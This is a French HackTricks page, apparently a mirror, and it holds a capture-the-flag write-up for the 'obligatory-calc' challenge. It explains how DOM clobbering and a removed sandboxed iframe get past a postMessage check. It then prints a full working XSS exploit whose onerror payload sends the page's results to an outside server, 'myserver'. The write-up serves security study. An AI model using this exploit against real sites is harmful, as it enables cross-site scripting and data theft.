mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-18 08:03:59 +00:00
6.1 KiB
6.1 KiB
Iframes dans SOP-2
Dans la solution de ce challenge, @Strellic_ propose une méthode similaire à la section précédente. Voyons cela.
Dans ce défi, l'attaquant doit contourner ceci :
if (e.source == window.calc.contentWindow && e.data.token == window.token) {
S'il le fait, il peut envoyer un postmessage avec du contenu HTML qui sera écrit dans la page avec innerHTML
sans assainissement (XSS).
La façon de contourner la première vérification consiste à rendre window.calc.contentWindow
undefined
et e.source
null
:
window.calc.contentWindow
est en faitdocument.getElementById("calc")
. Vous pouvez écraserdocument.getElementById
avec<img name=getElementById />
(notez que l'API Sanitizer -ici- n'est pas configurée pour protéger contre les attaques de substitution de DOM dans son état par défaut).- Par conséquent, vous pouvez écraser
document.getElementById("calc")
avec<img name=getElementById /><div id=calc></div>
. Ensuite,window.calc
seraundefined
. - Maintenant, nous avons besoin que
e.source
soitundefined
ounull
(parce que==
est utilisé au lieu de===
,null == undefined
estTrue
). Obtenir cela est "facile". Si vous créez un iframe et envoyez un postMessage depuis celui-ci et immédiatement supprimez l'iframe,e.origin
seranull
. Vérifiez le code suivant
- Par conséquent, vous pouvez écraser
let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null
Afin de contourner la deuxième vérification concernant le jeton, il suffit d'envoyer token
avec la valeur null
et de faire en sorte que la valeur de window.token
soit undefined
:
- L'envoi de
token
dans le postMessage avec la valeurnull
est trivial. window.token
est appelé dans la fonctiongetCookie
qui utilisedocument.cookie
. Notez que tout accès àdocument.cookie
dans les pages d'origine null déclenche une erreur. Cela fera en sorte quewindow.token
ait une valeurundefined
.
La solution finale proposée par @terjanq est la suivante :
<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');
function start(){
var ifr = document.createElement('iframe');
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = 'allow-scripts allow-popups';
ifr.srcdoc = `<script>(${hack})()<\/script>`
document.body.appendChild(ifr);
function hack(){
var win = open('https://obligatory-calc.ctf.sekai.team');
setTimeout(()=>{
parent.postMessage('remove', '*');
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
},1000);
}
// this removes the iframe so e.source becomes null in postMessage event.
onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
- Découvrez The PEASS Family, notre collection exclusive de NFTs
- Obtenez le swag officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR au dépôt hacktricks et au dépôt hacktricks-cloud.